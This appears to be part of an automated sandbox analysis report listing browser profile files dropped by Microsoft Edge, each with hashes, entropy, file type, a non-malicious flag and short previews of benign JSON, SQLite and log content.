                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):80
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.1827195470583955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHQlL+q2PN723oH+TcwtzjqEKj0QMxIFUtt0PQT1ZmwDmLVkwON723oH+Tcwtzv:7wIvVaYebvqBZFUtB1/e5OaYebvqBaJ
                                                                                                                                                                                                                                                                                                                            MD5:15C5B7082AE42A8AEEADADD0ADDE8914
                                                                                                                                                                                                                                                                                                                            SHA1:D2679FF4DC726F0FCD67E6F046BD70071716872D
                                                                                                                                                                                                                                                                                                                            SHA-256:1A4587BB9829EAA400D77D22E64805E99484B29940605D0A6E5EAF1BE121D7B7
                                                                                                                                                                                                                                                                                                                            SHA-512:55DD190E5B3C9C45F9840A2A2DBA74A883C695A714500C87C9D0352F6D71D324B24F14D47ED4A3697841AD669F11E2D42C08C113FA7F5E6CF99351FA2CF03543
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:30.210 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/05-02:39:30.213 1e58 Recovering log #3.2025/01/05-02:39:30.216 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.1827195470583955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHQlL+q2PN723oH+TcwtzjqEKj0QMxIFUtt0PQT1ZmwDmLVkwON723oH+Tcwtzv:7wIvVaYebvqBZFUtB1/e5OaYebvqBaJ
                                                                                                                                                                                                                                                                                                                            MD5:15C5B7082AE42A8AEEADADD0ADDE8914
                                                                                                                                                                                                                                                                                                                            SHA1:D2679FF4DC726F0FCD67E6F046BD70071716872D
                                                                                                                                                                                                                                                                                                                            SHA-256:1A4587BB9829EAA400D77D22E64805E99484B29940605D0A6E5EAF1BE121D7B7
                                                                                                                                                                                                                                                                                                                            SHA-512:55DD190E5B3C9C45F9840A2A2DBA74A883C695A714500C87C9D0352F6D71D324B24F14D47ED4A3697841AD669F11E2D42C08C113FA7F5E6CF99351FA2CF03543
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:30.210 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/05-02:39:30.213 1e58 Recovering log #3.2025/01/05-02:39:30.216 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.2260822624238665
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfRZ+q2PN723oH+TcwtpIFUttf2eGFZZmwDf2eGFNVkwON723oH+Tcwta/WLJ:7/L+vVaYebmFUt921/z2ZV5OaYebaUJ
                                                                                                                                                                                                                                                                                                                            MD5:B3A9BBB971FAB5CE137585EFA93E35F3
                                                                                                                                                                                                                                                                                                                            SHA1:2E18B3C4C3B756C968224647B3E29323EF7D36AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D63D1F4B9CDE134B04C42BA9AEC1C2257E88CB304FF3A3C3A412A6D8179AF933
                                                                                                                                                                                                                                                                                                                            SHA-512:CF7ED9B2C6F9A8845EB0FECD1F02415953AD79F671D7C3A8237F814D22F2B46E82404DA405CFB2F741D266E57C3691D7917CF02AA6387C19E3E68CD0D3F46A9A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.427 167c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/05-02:39:15.428 167c Recovering log #3.2025/01/05-02:39:15.428 167c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.2260822624238665
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfRZ+q2PN723oH+TcwtpIFUttf2eGFZZmwDf2eGFNVkwON723oH+Tcwta/WLJ:7/L+vVaYebmFUt921/z2ZV5OaYebaUJ
                                                                                                                                                                                                                                                                                                                            MD5:B3A9BBB971FAB5CE137585EFA93E35F3
                                                                                                                                                                                                                                                                                                                            SHA1:2E18B3C4C3B756C968224647B3E29323EF7D36AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D63D1F4B9CDE134B04C42BA9AEC1C2257E88CB304FF3A3C3A412A6D8179AF933
                                                                                                                                                                                                                                                                                                                            SHA-512:CF7ED9B2C6F9A8845EB0FECD1F02415953AD79F671D7C3A8237F814D22F2B46E82404DA405CFB2F741D266E57C3691D7917CF02AA6387C19E3E68CD0D3F46A9A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.427 167c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/05-02:39:15.428 167c Recovering log #3.2025/01/05-02:39:15.428 167c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.2678966348952967
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVums:Kq+n0JX91LyKOMq+8iP5GLP/0F
                                                                                                                                                                                                                                                                                                                            MD5:2FCACB2C0B81338150BCC9424EB228E4
                                                                                                                                                                                                                                                                                                                            SHA1:E3AF30631758C1976E59B20CC5C105F1010ACE16
                                                                                                                                                                                                                                                                                                                            SHA-256:F7302BBC7B98ADB3853F0EEA7782C654EC286A9DE331CFC5FABB415C635F0FB9
                                                                                                                                                                                                                                                                                                                            SHA-512:30A5B1ADCDB2045DD7323857D12AC933FBFE5CB27E46D4A2FD0971F7F08143024DE4541622CCF17A379F712108DE4D6BB4F9DC2C9FBBC262A041AE453C5688D5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                                                            MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                                                            SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                                                            SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                                                            SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11755
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                            MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                            SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                            SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                            SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40520
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.561150372842136
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nT+f2HWSQ7pLGLhJvW5wFZf4lS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPAMdWIY10:nauH5cchJvWaFZfUSu1jaxMdsFtgAsvt
                                                                                                                                                                                                                                                                                                                            MD5:63F0756172CA7EA7B90A53CE6953C216
                                                                                                                                                                                                                                                                                                                            SHA1:E13C9C1F4F55DCE3EEE877135D58955F39614D6B
                                                                                                                                                                                                                                                                                                                            SHA-256:861EA491104BCD68825567245B5B5F2A61CDF557AF28B2BF0277FBD98DF407A4
                                                                                                                                                                                                                                                                                                                            SHA-512:0F8454A8A3B7F307631F075827A7293B66CB93A2C6971A313A0971F7BF3BBF13425617794F2AF8C45E9BF39EF69F69224787992913E5B14C7DAF2EE6BC7153FC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):45056
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.4603303976143812
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8RZ6PWojcI5fc:TnUYVAKAFXX+LjcEc
                                                                                                                                                                                                                                                                                                                            MD5:B5DA1041AC145236112F096A59FDD1B2
                                                                                                                                                                                                                                                                                                                            SHA1:1BBF3217266CA16899899641C8D16608CCDBAF93
                                                                                                                                                                                                                                                                                                                            SHA-256:0431C9C6CF5F162B3C22DCD60AD457F34A2F2E7D1524E33DEF34E8066330A06F
                                                                                                                                                                                                                                                                                                                            SHA-512:A6B3B3D210B36E5356AA395005C8C01A7BFB1CA1B79C3A2391AC9D203024CF6DC91AA7A55B35B104970D6BAE1A6A56616E3D8DAED2DBC30ACF827F585C8292ED
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.05422612853454573
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:GtStut7iHyDZStut7iHyDd//6R9XjhslotGLNl0ml/Vl/XoQXEl:MtmHGntmHGAL1EjVl/PvoQ
                                                                                                                                                                                                                                                                                                                            MD5:292C4174C0161F0E32D14BE8B0A93913
                                                                                                                                                                                                                                                                                                                            SHA1:4F2B9C17AF77D8307FF519D78E55DE5FFCEE84C4
                                                                                                                                                                                                                                                                                                                            SHA-256:8C66E94520807AA6D8D9D9B81495B09AC2738AE346CD9176A75E29564A07AB82
                                                                                                                                                                                                                                                                                                                            SHA-512:59D15CFA637DC5CA0B6ADBAA845F11F0CD6E71C9C8425809A39BB7345BCB4308AED531C738B8D81ECC319AF2ED6100058B60564B38D5E82C8A5AD5CD94BC9472
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):86552
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8706676984937854
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aS:e6xLV0xNs/cNswO5NshNsaS
                                                                                                                                                                                                                                                                                                                            MD5:98D1CF18C28C6AD3CEEC7651B8B8D01B
